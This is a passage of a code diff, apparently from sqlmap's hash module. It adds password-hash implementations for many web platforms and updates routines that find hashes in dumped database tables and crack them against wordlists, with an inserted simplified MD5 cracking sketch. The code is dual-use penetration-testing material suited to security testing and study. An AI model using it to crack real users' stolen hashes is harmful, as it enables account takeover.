ctx1 = ctx1 + salt + + if i % 7: + ctx1 = ctx1 + password + + if i & 1: + ctx1 = ctx1 + final[:16] + else: + ctx1 = ctx1 + password + + final = md5(ctx1).digest() + + hash_ = _encode64((int(ord(final[0:1])) << 16) | (int(ord(final[6:7])) << 8) | (int(ord(final[12:13]))), 4) + hash_ = hash_ + _encode64((int(ord(final[1:2])) << 16) | (int(ord(final[7:8])) << 8) | (int(ord(final[13:14]))), 4) + hash_ = hash_ + _encode64((int(ord(final[2:3])) << 16) | (int(ord(final[8:9])) << 8) | (int(ord(final[14:15]))), 4) + hash_ = hash_ + _encode64((int(ord(final[3:4])) << 16) | (int(ord(final[9:10])) << 8) | (int(ord(final[15:16]))), 4) + hash_ = hash_ + _encode64((int(ord(final[4:5])) << 16) | (int(ord(final[10:11])) << 8) | (int(ord(final[5:6]))), 4) + hash_ = hash_ + _encode64((int(ord(final[11:12]))), 2) + + return getText(magic + salt + b'$' + getBytes(hash_)) + +def joomla_passwd(password, salt, **kwargs): + """ + Reference: https://stackoverflow.com/a/10428239 + + >>> joomla_passwd(password='testpass', salt='6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf') + 'e3d5794da74e917637332e0d21b76328:6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf' + """ + + return "%s:%s" % (md5(getBytes(password) + getBytes(salt)).hexdigest(), salt) + +def django_md5_passwd(password, salt, **kwargs): + """ + Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py + + >>> django_md5_passwd(password='testpass', salt='salt') + 'md5$salt$972141bcbcb6a0acc96e92309175b3c5' + """ + + return "md5$%s$%s" % (salt, md5(getBytes(salt) + getBytes(password)).hexdigest()) + +def django_sha1_passwd(password, salt, **kwargs): + """ + Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py + + >>> django_sha1_passwd(password='testpass', salt='salt') + 'sha1$salt$6ce0e522aba69d8baa873f01420fccd0250fc5b2' + """ + + return "sha1$%s$%s" % (salt, sha1(getBytes(salt) + getBytes(password)).hexdigest()) + +def vbulletin_passwd(password, salt, 
**kwargs): + """ + Reference: https://stackoverflow.com/a/2202810 + + >>> vbulletin_passwd(password='testpass', salt='salt') + '85c4d8ea77ebef2236fb7e9d24ba9482:salt' + """ + + return "%s:%s" % (md5(binascii.hexlify(md5(getBytes(password)).digest()) + getBytes(salt)).hexdigest(), salt) + +def oscommerce_old_passwd(password, salt, **kwargs): + """ + Reference: http://ryanuber.com/09-24-2010/os-commerce-password-hashing.html + + >>> oscommerce_old_passwd(password='testpass', salt='6b') + '16d39816e4545b3179f86f2d2d549af4:6b' + """ + + return "%s:%s" % (md5(getBytes(salt) + getBytes(password)).hexdigest(), salt) + +def phpass_passwd(password, salt, count, prefix, **kwargs): """ Reference(s): - http://packetstormsecurity.org/files/74448/phpassbrute.py.txt + https://web.archive.org/web/20120219120128/packetstormsecurity.org/files/74448/phpassbrute.py.txt http://scriptserver.mainframe8.com/wordpress_password_hasher.php + https://www.openwall.com/phpass/ + https://github.com/jedie/django-phpBB3/blob/master/django_phpBB3/hashers.py - >>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp', uppercase=False) + >>> phpass_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$') '$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0' + >>> phpass_passwd(password='testpass', salt='Pb1j9gSb', count=2048, prefix='$H$') + '$H$9Pb1j9gSb/u3EVQ.4JDZ3LqtN44oIx/' + >>> phpass_passwd(password='testpass', salt='iwtD/g.K', count=128, prefix='$S$') + '$S$5iwtD/g.KZT2rwC9DASy/mGYAThkSd3lBFdkONi1Ig1IEpBpqG8W' """ def _encode64(input_, count): @@ -248,12 +510,12 @@ def _encode64(input_, count): i = 0 while i < count: - value = ord(input_[i]) + value = (input_[i] if isinstance(input_[i], int) else ord(input_[i])) i += 1 output = output + ITOA64[value & 0x3f] if i < count: - value = value | (ord(input_[i]) << 8) + value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 8) output = output + ITOA64[(value >> 6) & 0x3f] @@ -262,7 +524,7 @@ def _encode64(input_, count): break if i < count: - value = value | (ord(input_[i]) << 16) + value = value | ((input_[i] if isinstance(input_[i], int) else ord(input_[i])) << 16) output = output + ITOA64[(value >> 12) & 0x3f] @@ -274,118 +536,216 @@ def _encode64(input_, count): return output - cipher = md5(salt) + password = getBytes(password) + f = {"$P$": md5, "$H$": md5, "$Q$": sha1, "$S$": sha512}[prefix] + + cipher = f(getBytes(salt)) cipher.update(password) hash_ = cipher.digest() for i in xrange(count): - _ = md5(hash_) + _ = f(hash_) _.update(password) hash_ = _.digest() - retVal = prefix + _encode64(hash_, 16) + retVal = "%s%s%s%s" % (prefix, ITOA64[int(math.log(count, 2))], salt, _encode64(hash_, len(hash_))) + + if prefix == "$S$": + # Reference: https://api.drupal.org/api/drupal/includes%21password.inc/constant/DRUPAL_HASH_LENGTH/7.x + retVal = retVal[:55] - return retVal.upper() if uppercase else retVal + return retVal __functions__ = { - HASH.MYSQL: mysql_passwd, - HASH.MYSQL_OLD: mysql_old_passwd, - HASH.POSTGRES: postgres_passwd, - HASH.MSSQL: mssql_passwd, - HASH.MSSQL_OLD: mssql_old_passwd, - HASH.ORACLE: oracle_passwd, - HASH.ORACLE_OLD: oracle_old_passwd, - HASH.MD5_GENERIC: md5_generic_passwd, - HASH.SHA1_GENERIC: sha1_generic_passwd, - HASH.CRYPT_GENERIC: crypt_generic_passwd, - HASH.WORDPRESS: wordpress_passwd, - } + HASH.MYSQL: mysql_passwd, + HASH.MYSQL_OLD: mysql_old_passwd, + HASH.POSTGRES: postgres_passwd, + HASH.MSSQL: mssql_passwd, + HASH.MSSQL_OLD: mssql_old_passwd, + HASH.MSSQL_NEW: 
mssql_new_passwd, + HASH.ORACLE: oracle_passwd, + HASH.ORACLE_OLD: oracle_old_passwd, + HASH.MD5_GENERIC: md5_generic_passwd, + HASH.SHA1_GENERIC: sha1_generic_passwd, + HASH.SHA224_GENERIC: sha224_generic_passwd, + HASH.SHA256_GENERIC: sha256_generic_passwd, + HASH.SHA384_GENERIC: sha384_generic_passwd, + HASH.SHA512_GENERIC: sha512_generic_passwd, + HASH.CRYPT_GENERIC: crypt_generic_passwd, + HASH.JOOMLA: joomla_passwd, + HASH.DJANGO_MD5: django_md5_passwd, + HASH.DJANGO_SHA1: django_sha1_passwd, + HASH.PHPASS: phpass_passwd, + HASH.APACHE_MD5_CRYPT: unix_md5_passwd, + HASH.UNIX_MD5_CRYPT: unix_md5_passwd, + HASH.APACHE_SHA1: apache_sha1_passwd, + HASH.VBULLETIN: vbulletin_passwd, + HASH.VBULLETIN_OLD: vbulletin_passwd, + HASH.OSCOMMERCE_OLD: oscommerce_old_passwd, + HASH.SSHA: ssha_passwd, + HASH.SSHA256: ssha256_passwd, + HASH.SSHA512: ssha512_passwd, + HASH.MD5_BASE64: md5_generic_passwd, + HASH.SHA1_BASE64: sha1_generic_passwd, + HASH.SHA256_BASE64: sha256_generic_passwd, + HASH.SHA512_BASE64: sha512_generic_passwd, +} + +def _finalize(retVal, results, processes, attack_info=None): + if _multiprocessing: + gc.enable() + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4367 + # NOTE: https://dzone.com/articles/python-101-creating-multiple-processes + for process in processes: + try: + process.terminate() + process.join() + except (OSError, AttributeError): + pass + + if retVal: + removals = set() + + if conf.hashDB: + conf.hashDB.beginTransaction() + + while not retVal.empty(): + user, hash_, word = item = retVal.get(block=False) + results.append(item) + removals.add((user, hash_)) + hashDBWrite(hash_, word) + + for item in attack_info or []: + if (item[0][0], item[0][1]) in removals: + attack_info.remove(item) + + if conf.hashDB: + conf.hashDB.endTransaction() + + if hasattr(retVal, "close"): + retVal.close() def storeHashesToFile(attack_dict): if not attack_dict: return - handle, filename = tempfile.mkstemp(suffix=".txt") - os.close(handle) - - warnMsg = "writing hashes to file '%s' " % filename - warnMsg += "for eventual further processing with other tools" - logger.warn(warnMsg) - - items = set() - - with open(filename, "w+") as f: - for user, hashes in attack_dict.items(): - for hash_ in hashes: - if not hash_ or hash_ == NULL or not hashRecognition(hash_): - continue + items = OrderedSet() + for user, hashes in attack_dict.items(): + for hash_ in hashes: + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ + if hash_ and hash_ != NULL and hashRecognition(hash_): item = None if user and not user.startswith(DUMMY_USER_PREFIX): - item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING)) + item = "%s:%s\n" % (user, hash_) else: - item = "%s\n" % hash_.encode(UNICODE_ENCODING) + item = "%s\n" % hash_ if item and item not in items: - f.write(item) items.add(item) + if kb.choices.storeHashes is None: + message = "do you want to store hashes to a temporary file " + message += "for eventual further processing with other tools [y/N] " + + kb.choices.storeHashes = readInput(message, default='N', boolean=True) + + if items and kb.choices.storeHashes: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt") + os.close(handle) + + infoMsg = "writing hashes to a temporary file '%s' " % filename + logger.info(infoMsg) + + with openFile(filename, "w+") as f: + for item in items: + try: + f.write(item) + except (UnicodeError, TypeError): + pass + def attackCachedUsersPasswords(): if kb.data.cachedUsersPasswords: results = 
dictionaryAttack(kb.data.cachedUsersPasswords) + lut = {} for (_, hash_, password) in results: - for user in kb.data.cachedUsersPasswords.keys(): - for i in xrange(len(kb.data.cachedUsersPasswords[user])): - if kb.data.cachedUsersPasswords[user][i] and hash_.lower() in kb.data.cachedUsersPasswords[user][i].lower()\ - and 'clear-text password' not in kb.data.cachedUsersPasswords[user][i].lower(): - kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', password) + lut[hash_.lower()] = password + + for user in kb.data.cachedUsersPasswords: + for i in xrange(len(kb.data.cachedUsersPasswords[user])): + if (kb.data.cachedUsersPasswords[user][i] or "").strip(): + value = kb.data.cachedUsersPasswords[user][i].lower().split()[0] + if value in lut: + kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value]) def attackDumpedTable(): if kb.data.dumpedTable: table = kb.data.dumpedTable - columns = table.keys() + columns = list(table.keys()) count = table["__infos__"]["count"] if not count: return - infoMsg = "analyzing table dump for possible password hashes" - logger.info(infoMsg) + debugMsg = "analyzing table dump for possible password hashes" + logger.debug(debugMsg) found = False col_user = '' col_passwords = set() attack_dict = {} + binary_fields = OrderedSet() + replacements = {} - for column in columns: + for column in sorted(columns, key=len, reverse=True): if column and column.lower() in COMMON_USER_COLUMNS: col_user = column break + for column in columns: + if column != "__infos__" and table[column]["values"]: + if all(INVALID_UNICODE_CHAR_FORMAT.split('%')[0] in (value or "") for value in table[column]["values"]): + binary_fields.add(column) + + if binary_fields: + _ = ','.join(binary_fields) + warnMsg = "potential binary fields detected ('%s'). In case of any problems you are " % _ + warnMsg += "advised to rerun table dump with '--fresh-queries --binary-fields=\"%s\"'" % _ + logger.warning(warnMsg) + for i in xrange(count): if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD: break for column in columns: - if column == col_user or column == '__infos__': + if column == col_user or column == "__infos__": + continue + + if len(table[column]["values"]) <= i: continue - if len(table[column]['values']) <= i: + if conf.binaryFields and column in conf.binaryFields: continue - value = table[column]['values'][i] + value = table[column]["values"][i] + + if column in binary_fields and re.search(HASH_BINARY_COLUMNS_REGEX, column) is not None: + previous = value + value = encodeHex(getBytes(value), binary=False) + replacements[value] = previous if hashRecognition(value): found = True - if col_user and i < len(table[col_user]['values']): - if table[col_user]['values'][i] not in attack_dict: - attack_dict[table[col_user]['values'][i]] = [] + if col_user and i < len(table[col_user]["values"]): + if table[col_user]["values"][i] not in attack_dict: + attack_dict[table[col_user]["values"][i]] = [] - attack_dict[table[col_user]['values'][i]].append(value) + attack_dict[table[col_user]["values"][i]].append(value) else: - attack_dict['%s%d' % (DUMMY_USER_PREFIX, i)] = [value] + attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [value] col_passwords.add(column) @@ -397,11 +757,11 @@ def attackDumpedTable(): storeHashesToFile(attack_dict) message = "do you want to crack them via a dictionary-based attack? 
%s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") - test = readInput(message, default="N" if conf.multipleTargets else "Y") + choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException results = dictionaryAttack(attack_dict) @@ -409,10 +769,12 @@ def attackDumpedTable(): for (_, hash_, password) in results: if hash_: - lut[hash_.lower()] = password + key = hash_ if hash_ not in replacements else replacements[hash_] + lut[key.lower()] = password + lut["0x%s" % key.lower()] = password - infoMsg = "postprocessing table dump" - logger.info(infoMsg) + debugMsg = "post-processing table dump" + logger.debug(debugMsg) for i in xrange(count): for column in columns: @@ -420,34 +782,55 @@ def attackDumpedTable(): value = table[column]['values'][i] if value and value.lower() in lut: - table[column]['values'][i] += " (%s)" % lut[value.lower()] + table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER)) table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) +@cachedmethod def hashRecognition(value): + """ + >>> hashRecognition("179ad45c6ce2cb97cf1029e212046e81") == HASH.MD5_GENERIC + True + >>> hashRecognition("S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C") == HASH.ORACLE + True + >>> hashRecognition("foobar") == None + True + """ + retVal = None - isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) + if value and len(value) >= 8 and ' ' not in value: # Note: pre-filter condition (for optimization purposes) + isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) - if isinstance(value, basestring): - for name, regex in getPublicTypeMembers(HASH): - # Hashes for Oracle and old MySQL look the same hence these checks - if isOracle and regex == HASH.MYSQL_OLD: - continue - elif isMySQL and regex == HASH.ORACLE_OLD: - continue - elif regex == HASH.CRYPT_GENERIC: - if any((value.lower() == value, value.upper() == value)): + if kb.cache.hashRegex is None: + parts = [] + + for name, regex in getPublicTypeMembers(HASH): + # Hashes for Oracle and old MySQL look the same hence these checks + if isOracle and regex == HASH.MYSQL_OLD or isMySQL and regex == HASH.ORACLE_OLD: continue - elif re.match(regex, value): - retVal = regex - break + elif regex == HASH.CRYPT_GENERIC: + if any((value.lower() == value, value.upper() == value)): + continue + else: + parts.append("(?P<%s>%s)" % (name, regex)) + + kb.cache.hashRegex = ('|'.join(parts)).replace("(?i)", "") + + if isinstance(value, six.string_types): + match = re.search(kb.cache.hashRegex, value, re.I) + if match: + algorithm, _ = [_ for _ in match.groupdict().items() if _[1] is not None][0] + retVal = getattr(HASH, algorithm) return retVal -def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): +def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api): + if IS_WIN: + coloramainit() + count = 0 rotator = 0 - hashes = set([item[0][1] for item in attack_info]) + hashes = set(item[0][1] for item in attack_info) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) @@ -456,7 +839,11 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc if 
not attack_info: break - if not isinstance(word, basestring): + count += 1 + + if isinstance(word, six.binary_type): + word = getUnicode(word) + elif not isinstance(word, six.string_types): continue if suffix: @@ -465,8 +852,6 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc try: current = __functions__[hash_regex](password=word, uppercase=False) - count += 1 - if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item @@ -489,10 +874,14 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 + if rotator >= len(ROTATING_CHARS): rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) + + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + + if not api: + dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise @@ -500,19 +889,23 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries - except: - warnMsg = "there was a problem while hashing entry: %s. " % repr(word) - warnMsg += "Please report by e-mail to %s" % ML + except Exception as ex: + warnMsg = "there was a problem while hashing entry: %s ('%s'). " % (repr(word), getSafeExString(ex)) + warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS logger.critical(warnMsg) except KeyboardInterrupt: pass finally: - if hasattr(proc_count, 'value'): - proc_count.value -= 1 + if hasattr(proc_count, "value"): + with proc_count.get_lock(): + proc_count.value -= 1 + +def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api): + if IS_WIN: + coloramainit() -def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): count = 0 rotator = 0 @@ -523,16 +916,19 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found if found.value: break - current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) count += 1 - if not isinstance(word, basestring): + if isinstance(word, six.binary_type): + word = getUnicode(word) + elif not isinstance(word, six.string_types): continue if suffix: word = word + suffix try: + current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) + if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() @@ -552,14 +948,19 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found found.value = True - elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: + elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 + if rotator >= len(ROTATING_CHARS): rotator = 0 - status = 'current status: %s... 
%s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - if not user.startswith(DUMMY_USER_PREFIX): - status += ' (user: %s)' % user - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) + + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + + if user and not user.startswith(DUMMY_USER_PREFIX): + status += " (user: %s)" % user + + if not api: + dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise @@ -567,38 +968,63 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries - except Exception, e: - warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) - warnMsg += "Please report by e-mail to %s" % ML + except Exception as ex: + warnMsg = "there was a problem while hashing entry: %s ('%s'). " % (repr(word), getSafeExString(ex)) + warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS logger.critical(warnMsg) except KeyboardInterrupt: pass finally: - if hasattr(proc_count, 'value'): - proc_count.value -= 1 + if hasattr(proc_count, "value"): + with proc_count.get_lock(): + proc_count.value -= 1 def dictionaryAttack(attack_dict): + global _multiprocessing + suffix_list = [""] - custom_wordlist = [] + custom_wordlist = [""] hash_regexes = [] results = [] resumes = [] - processException = False user_hash = [] + processException = False + foundHash = False + + if conf.disableMulti: + _multiprocessing = None + else: + # Note: https://github.com/sqlmapproject/sqlmap/issues/4367 + try: + import multiprocessing + + # problems on FreeBSD (Reference: https://web.archive.org/web/20110710041353/http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) + _ = multiprocessing.Queue() + + # problems with ctypes (Reference: https://github.com/sqlmapproject/sqlmap/issues/2952) + _ = multiprocessing.Value('i') + except (ImportError, OSError, AttributeError): + pass + else: + try: + if multiprocessing.cpu_count() > 1: + _multiprocessing = multiprocessing + except NotImplementedError: + pass for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue - hash_ = hash_.split()[0] + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) - infoMsg = "using hash method '%s'" % __functions__[regex].func_name + infoMsg = "using hash method '%s'" % __functions__[regex].__name__ logger.info(infoMsg) for hash_regex in hash_regexes: @@ -610,39 +1036,64 @@ def dictionaryAttack(attack_dict): if not hash_: continue - hash_ = hash_.split()[0] + foundHash = True + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): - item = None - - if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): - hash_ = hash_.lower() - - if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): - item = [(user, hash_), {}] - elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): - item = [(user, hash_), {'username': user}] - elif hash_regex in (HASH.ORACLE): - item = [(user, hash_), {'salt': hash_[-20:]}] - elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD): - item = [(user, hash_), {'salt': hash_[6:14]}] - elif hash_regex in (HASH.CRYPT_GENERIC): - item = [(user, hash_), {'salt': hash_[0:2]}] - elif hash_regex in (HASH.WORDPRESS): - item = [(user, 
hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] - - if item and hash_ not in keys: - resumed = hashDBRetrieve(hash_) - if not resumed: - attack_info.append(item) - user_hash.append(item[0]) - else: - infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) - if user and not user.startswith(DUMMY_USER_PREFIX): - infoMsg += " for user '%s'" % user - logger.info(infoMsg) - resumes.append((user, hash_, resumed)) - keys.add(hash_) + try: + item = None + + if hash_regex not in (HASH.CRYPT_GENERIC, HASH.JOOMLA, HASH.PHPASS, HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA, HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5, HASH.DJANGO_SHA1, HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): + hash_ = hash_.lower() + + if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): + item = [(user, encodeHex(decodeBase64(hash_, binary=True))), {}] + elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): + if hash_.startswith("0x"): # Reference: https://docs.microsoft.com/en-us/sql/t-sql/functions/hashbytes-transact-sql?view=sql-server-2017 + hash_ = hash_[2:] + item = [(user, hash_), {}] + elif hash_regex in (HASH.SSHA,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[20:]}] + elif hash_regex in (HASH.SSHA256,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[32:]}] + elif hash_regex in (HASH.SSHA512,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[64:]}] + elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): + item = [(user, hash_), {'username': user}] + elif hash_regex in (HASH.ORACLE,): + item = [(user, hash_), {"salt": hash_[-20:]}] + elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): + item = [(user, hash_), {"salt": hash_[6:14]}] + elif hash_regex in (HASH.CRYPT_GENERIC,): + item = [(user, hash_), {"salt": hash_[0:2]}] + elif hash_regex in (HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT): + item = [(user, hash_), {"salt": hash_.split('$')[2], "magic": "$%s$" % hash_.split('$')[1]}] + elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.OSCOMMERCE_OLD): + item = [(user, hash_), {"salt": hash_.split(':')[-1]}] + elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1): + item = [(user, hash_), {"salt": hash_.split('$')[1]}] + elif hash_regex in (HASH.PHPASS,): + if ITOA64.index(hash_[3]) < 32: + item = [(user, hash_), {"salt": hash_[4:12], "count": 1 << ITOA64.index(hash_[3]), "prefix": hash_[:3]}] + else: + warnMsg = "invalid hash '%s'" % hash_ + logger.warning(warnMsg) + + if item and hash_ not in keys: + resumed = hashDBRetrieve(hash_) + if not resumed: + attack_info.append(item) + user_hash.append(item[0]) + else: + infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) + if user and not user.startswith(DUMMY_USER_PREFIX): + infoMsg += " for user '%s'" % user + logger.info(infoMsg) + resumes.append((user, hash_, resumed)) + keys.add(hash_) + + except (binascii.Error, TypeError, IndexError): + pass if not attack_info: continue @@ -651,7 +1102,7 @@ def dictionaryAttack(attack_dict): while not kb.wordlists: # the slowest of all methods hence smaller default dict - if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): + if hash_regex in (HASH.ORACLE_OLD, HASH.PHPASS): dictPaths = [paths.SMALL_DICT] else: 
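
Note (illustrative, not part of the patch): the dictionary attack built up in this hunk boils down to hashing each wordlist candidate (plus optional suffixes) with the recognized algorithm and comparing the result against the stored digest; salted formats additionally pass the salt parsed out of the stored hash as keyword arguments, and sqlmap may fan the same loop out over multiprocessing workers. The simplified sketch below shows only the core comparison loop for an unsalted MD5 hash; `crack_one` and `wordlist` are hypothetical names, and the example digest is the `md5('testpass')` value already used in the doctests above.

```python
# Simplified core of a dictionary-based attack: hash each candidate word and
# compare against the target digest (unsalted MD5 case only).
import hashlib

def md5_generic(password):
    return hashlib.md5(password.encode("utf8")).hexdigest()

def crack_one(target_hash, wordlist, suffixes=("",)):
    target_hash = target_hash.lower()
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            if md5_generic(candidate) == target_hash:
                return candidate
    return None

# '179ad45c6ce2cb97cf1029e212046e81' is md5('testpass'), as in the doctests above.
print(crack_one("179ad45c6ce2cb97cf1029e212046e81", ["wrong", "testpass"]))
```
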
dictPaths = [paths.WORDLIST] @@ -660,41 +1111,50 @@ def dictionaryAttack(attack_dict): message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" - choice = readInput(message, default="1") + choice = readInput(message, default='1') try: - if choice == "2": + if choice == '2': message = "what's the custom dictionary's location?\n" - dictPaths = [readInput(message)] - - logger.info("using custom dictionary") - elif choice == "3": + dictPath = readInput(message) + if dictPath: + dictPaths = [dictPath] + logger.info("using custom dictionary") + elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) - logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") + dictPaths = [_ for _ in dictPaths if _] + for dictPath in dictPaths: checkFile(dictPath) + if isZipFile(dictPath): + _ = zipfile.ZipFile(dictPath, 'r') + if len(_.namelist()) == 0: + errMsg = "no file(s) inside '%s'" % dictPath + raise SqlmapDataException(errMsg) + else: + _.open(_.namelist()[0]) + kb.wordlists = dictPaths - except SqlmapFilePathException, msg: + except Exception as ex: warnMsg = "there was a problem while loading dictionaries" - warnMsg += " ('%s')" % msg + warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " - test = readInput(message, default="N") - if test[0] in ("y", "Y"): + if readInput(message, default='N', boolean=True): suffix_list += COMMON_PASSWORD_SUFFIXES - infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name + infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].__name__ logger.info(infoMsg) for item in attack_info: @@ -702,7 +1162,8 @@ def dictionaryAttack(attack_dict): if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) - if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): + # Algorithms without extra arguments (e.g. 
